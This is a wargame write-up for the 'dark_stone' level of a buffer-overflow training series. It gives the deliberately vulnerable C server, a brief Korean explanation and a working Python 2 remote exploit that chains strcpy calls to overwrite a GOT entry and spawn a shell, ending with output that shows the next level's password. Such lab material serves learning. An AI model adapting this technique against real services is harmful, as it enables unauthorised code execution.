/* The Lord of the BOF : The Fellowship of the BOF
   - dark_stone
   - Remote BOF on Fedora Core 3
   - hint : GOT overwriting again
   - port : TCP 8888 */

#include <stdio.h>
/* NOTE(review): strlen, memcpy, strcpy and memset are called below without
   <string.h>; the build relies on implicit declarations of these functions. */

// magic potion for you
// pop/pop/ret gadget deliberately left in the binary (see the hint in the
// header): the two pops discard two stack slots and ret jumps to the third.
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}

// Deliberately vulnerable challenge target: reads one line and copies it
// unbounded into a 256-byte stack buffer. The surrounding memset/memcpy
// calls depend on the exact stack layout of these locals, so declaration
// order matters here.
int main()
{
    char buffer[256];
    char saved_sfp[4];
    int length;
    char temp[1024];

    printf("dark_stone : how fresh meat you are!\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    // Reads up to 1023 bytes into temp; buffer below holds only 256.
    fgets(temp, 1024, stdin);

    // for disturbance RET sleding
    length = strlen(temp);

    // save sfp
    // buffer+264 is past the end of the 256-byte buffer; the original comment
    // identifies that location as the saved frame pointer (layout dependent).
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    // Unbounded copy of temp (up to 1023 bytes) into buffer[256] — this is
    // the intended defect. A size-bounded copy (e.g. snprintf with
    // sizeof buffer) would close it.
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    // Zeroes memory from the end of the copied input up to 0xff000000; per
    // the original comment this is meant to disturb RET sledding.
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    // buffer cleaning
    // NOTE(review): an integer constant is passed where a pointer is expected;
    // the range zeroed is 0xf6ffe000..0xf7000000.
    memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

    printf("%s\n", buffer);
}
다른 점은 remote라는 것밖에 없다.
슈퍼데몬이라서 공격방법은 똑같고, 소켓으로 보내는점만 다르다.
이전 단계의 exploit에서 주소들만 수정해주고, 소켓으로 보내면 된다.
import os  # NOTE(review): unused in this script
import struct
from socket import *


def L_E(number):
    """Pack `number` as a 4-byte little-endian unsigned int (struct '<I')."""
    return struct.pack('<I',number)


# Addresses are specific to the challenge binary (taken from the write-up);
# they do not transfer to any other build of the program.
PPR = 0x80484f3 # pop-pop-ret
STRCPY = 0x8048438
MEMCPY = 0x8048418
MEMCPY_GOT = 0x8049850
BINSH = 0x8049878
# Locations of single constant bytes inside the binary, used as strcpy sources.
str_c0 = 0x80484c8+8
str_07 = 0x8048178+4
str_75 = 0x80482b4
str_00 = 0x8048138
str_slash = 0x8048114
str_b = 0x8048114+3
str_i = 0x8048114+2
str_n = 0x8048114+10
str_s = 0x8048740+6
str_h = 0x80481b4+4

# 268 bytes of filler reach the saved return address (buffer[256] with the
# sfp at buffer+264 in the target source above).
payload = 'A'*268
# Chain of strcpy(dst, src) calls, each returning through the pop-pop-ret
# gadget into the next one. The first four write one byte each into
# memcpy's GOT entry; the following eight write one byte each into BINSH.
# Defensive note: full RELRO (GOT read-only after relocation) blocks this
# kind of GOT write, and a stack canary stops the overflow before the
# return address is reached.
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT)
payload += L_E(str_c0)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+1)
payload += L_E(str_07)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+2)
payload += L_E(str_75)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+3)
payload += L_E(str_00)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH)
payload += L_E(str_slash)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+1)
payload += L_E(str_b)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+2)
payload += L_E(str_i)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+3)
payload += L_E(str_n)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+4)
payload += L_E(str_slash)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+5)
payload += L_E(str_s)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+6)
payload += L_E(str_h)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+7)
payload += L_E(str_00)
# Final frame: call through the (now rewritten) memcpy GOT entry, with
# "AAAA" as its return address slot and BINSH as the first argument.
payload += L_E(MEMCPY)
payload += "AAAA"
payload += L_E(BINSH)

# Python 2 script: str payloads, print statement, raw_input. Under Python 3
# send() would need bytes and print/raw_input would have to change.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost',8888))
s.send(payload+'\n')
print s.recv(1024)
# Interactive relay loop. A single recv(1024) may return only part of a
# response; longer output is simply cut off here.
while True:
    cmd = raw_input('$ ')
    if cmd == 'exit':
        s.close()
        break
    s.send(cmd+'\n')
    result = s.recv(1024)
    print result
s.close()
$ python exploit.py dark_stone : how fresh meat you are! you : $ my-pass euid = 505 let there be light